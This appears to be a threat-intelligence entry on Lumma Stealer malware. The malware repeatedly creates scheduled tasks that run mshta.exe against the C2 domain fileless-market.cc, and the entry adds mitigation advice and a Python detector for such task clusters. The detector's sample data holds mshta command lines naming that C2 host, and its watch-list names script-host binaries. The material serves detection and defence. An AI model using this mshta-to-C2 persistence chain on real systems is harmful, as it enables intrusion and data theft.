Infection repeatedly adds scheduled tasks and increases traffic to the same C2 domain (Wed, Jan 14th)
Introduction
AI Analysis
Technical Summary
The Lumma Stealer malware has been observed engaging in a distinctive post-infection behavior pattern involving the repeated creation of scheduled tasks on infected Windows hosts. After initial data exfiltration, the infected system retrieves a PowerShell command from a Pastebin raw URL, which downloads and executes a script from a .cc domain (fileless-market.cc) using mshta.exe. This script execution triggers the creation of multiple scheduled tasks, each configured to run the same mshta command targeting the C2 server. Over time, the number of scheduled tasks increases significantly (e.g., 31 tasks after 11 hours), all performing identical actions, thereby generating persistent and increasing HTTPS traffic to the same C2 domain. This behavior is unusual and has not been previously documented by SANS ISC handlers. The infection chain relies on fileless techniques built on PowerShell and mshta, which complicates detection and removal. The scheduled tasks provide persistence and ensure continuous communication with the attacker-controlled C2 infrastructure. The infection's reliance on Pastebin for initial command retrieval and the use of .cc domains for C2 traffic indicate a multi-stage infection process. Although no known exploits have been reported, the infection's persistence and data exfiltration capabilities pose a medium severity threat. The infection primarily affects Windows hosts and abuses native Windows tools for stealth and persistence.
Potential Impact
For European organizations, this threat can lead to prolonged unauthorized access and data exfiltration due to the persistent scheduled tasks that maintain continuous C2 communication. The repeated creation of scheduled tasks can degrade system performance and increase network traffic, potentially triggering network congestion or detection alerts. The use of legitimate Windows utilities (mshta and PowerShell) for malicious purposes complicates detection and remediation efforts, increasing the risk of prolonged compromise. Sensitive data could be continuously siphoned off, impacting confidentiality. The persistence mechanism also increases the difficulty of fully eradicating the infection, raising the risk of lateral movement within networks. Organizations in critical infrastructure, finance, healthcare, and government sectors could face significant operational and reputational damage if infected. The infection's stealthy nature may delay incident response, allowing attackers to maintain footholds and expand their access.
Mitigation Recommendations
1. Implement monitoring and alerting for unusual scheduled task creation patterns, especially multiple tasks with identical triggers and actions involving mshta.exe or PowerShell commands.
2. Restrict or block outbound traffic to suspicious domains such as fileless-market.cc and Pastebin raw URLs used for command retrieval at network perimeter firewalls and DNS filtering solutions.
3. Apply application control policies to restrict or block mshta.exe and PowerShell usage to only approved scripts and commands, leveraging Windows Defender Application Control or similar tools.
4. Conduct thorough endpoint detection and response (EDR) investigations to identify and remove all scheduled tasks related to this infection and any associated persistence mechanisms.
5. Educate security teams to recognize fileless infection patterns and unusual scheduled task behaviors.
6. Regularly update and patch Windows systems to reduce the attack surface, although this infection leverages legitimate tools rather than software vulnerabilities.
7. Employ network traffic analysis to detect abnormal HTTPS session volumes to uncommon domains.
8. Use threat intelligence feeds to update blocklists and detection signatures related to Lumma Stealer and associated infrastructure.
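Recommendation 1 asks for alerting on many scheduled tasks that share one identical mshta or PowerShell action. The script below is an added example, not code from the SANS ISC diary or from the Lumma Stealer analysis above: it runs detection logic over a constructed sample of Windows Security event ID 4698 ("A scheduled task was created") records flattened to one line each. Task names, timestamps, the event line format and the URL path are assumptions made for the example; the only page-derived values are the mshta.exe binary and the fileless-market.cc domain. Events are grouped by (binary, normalized arguments) and a finding is raised when a watched living-off-the-land binary appears in at least `min_tasks` distinct tasks with the same action inside a time window, which is exactly the "31 identical tasks in 11 hours" shape described above.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Constructed sample of event ID 4698 records, one per line (assumed flattened
# export format). Task names, times and the URL path are made up; the last line
# is deliberately malformed so the parser's skip path is exercised.
SAMPLE_EVENTS = [
    '2026-01-14T08:02:11Z EventID=4698 TaskName="\\Vendor\\UpdateCheck" Command="C:\\Program Files\\Vendor\\updater.exe" Arguments="/check"',
    '2026-01-14T08:15:40Z EventID=4698 TaskName="\\UpdateTask_4f2a" Command="C:\\Windows\\System32\\mshta.exe" Arguments="https://fileless-market.cc/PLACEHOLDER"',
    '2026-01-14T09:00:00Z EventID=4698 TaskName="\\Admin\\Inventory" Command="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Arguments="-File C:\\Scripts\\inventory.ps1"',
    '2026-01-14T10:15:41Z EventID=4698 TaskName="\\UpdateTask_9c01" Command="C:\\Windows\\System32\\mshta.exe" Arguments="https://fileless-market.cc/PLACEHOLDER"',
    '2026-01-14T12:15:39Z EventID=4698 TaskName="\\UpdateTask_b77e" Command="C:\\Windows\\System32\\MSHTA.EXE" Arguments="https://FILELESS-MARKET.cc/PLACEHOLDER"',
    '2026-01-14T14:16:02Z EventID=4698 TaskName="\\UpdateTask_03dd" Command="mshta.exe" Arguments="https://fileless-market.cc/PLACEHOLDER"',
    '2026-01-14T19:15:58Z EventID=4698 TaskName="\\UpdateTask_e1a5" Command="C:\\Windows\\System32\\mshta.exe" Arguments="https://fileless-market.cc/PLACEHOLDER"',
    "garbage line without the expected fields",
]

EVENT_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) EventID=4698 '
    r'TaskName="(?P<name>[^"]+)" Command="(?P<cmd>[^"]+)" Arguments="(?P<args>[^"]*)"$'
)
# Script hosts that legitimate software rarely schedules dozens of times.
WATCHED_BINARIES = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
URL_HOST_RE = re.compile(r"https?://([^/\s]+)")


def parse_event(line):
    """Return a dict for a well-formed 4698 line, or None so callers can skip it."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    return {
        "time": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "task": m["name"],
        # Compare on the executable name only: full path and case vary per task.
        "binary": PureWindowsPath(m["cmd"]).name.lower(),
        # Collapse whitespace and case so cosmetically different actions still group.
        "args": " ".join(m["args"].split()).lower(),
    }


def find_repeated_task_clusters(lines, min_tasks=3, window=timedelta(hours=24)):
    """Group task-creation events by identical action and flag clusters that use a
    watched binary in at least min_tasks tasks created within `window`."""
    groups = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev is not None:
            groups[(ev["binary"], ev["args"])].append(ev)

    findings = []
    for (binary, args), events in groups.items():
        if binary not in WATCHED_BINARIES or len(events) < min_tasks:
            continue
        events.sort(key=lambda e: e["time"])
        first, last = events[0]["time"], events[-1]["time"]
        if last - first > window:
            continue
        host = URL_HOST_RE.search(args)
        findings.append({
            "binary": binary,
            "arguments": args,
            "domain": host.group(1) if host else None,
            "count": len(events),
            "task_names": [e["task"] for e in events],
            "first_seen": first,
            "last_seen": last,
            "span_hours": (last - first).total_seconds() / 3600,
        })
    findings.sort(key=lambda f: f["count"], reverse=True)
    return findings


if __name__ == "__main__":
    for f in find_repeated_task_clusters(SAMPLE_EVENTS):
        print(f"{f['count']} tasks run {f['binary']} against {f['domain']} over "
              f"{f['span_hours']:.1f} h: {', '.join(f['task_names'])}")
```

Feeding the same function a real 4698 export turns recommendation 1 into a concrete alert: the single benign PowerShell task and the vendor updater never cluster, while the five tasks that differ only in name and casing collapse onto one action and one domain. Raising `min_tasks` or shortening `window` tunes the trade-off between catching the early stage of the growth described above and tolerating products that legitimately register a handful of identical tasks.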
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland
Technical Details
Article Source: https://isc.sans.edu/diary/rss/32628 (fetched 2026-01-14T19:50:05.742Z, 505 words)
Threat ID: 6967f375f809b25a98068854
Added to database: 1/14/2026, 7:50:13 PM
Last enriched: 1/14/2026, 7:50:30 PM
Last updated: 2/4/2026, 10:31:20 PM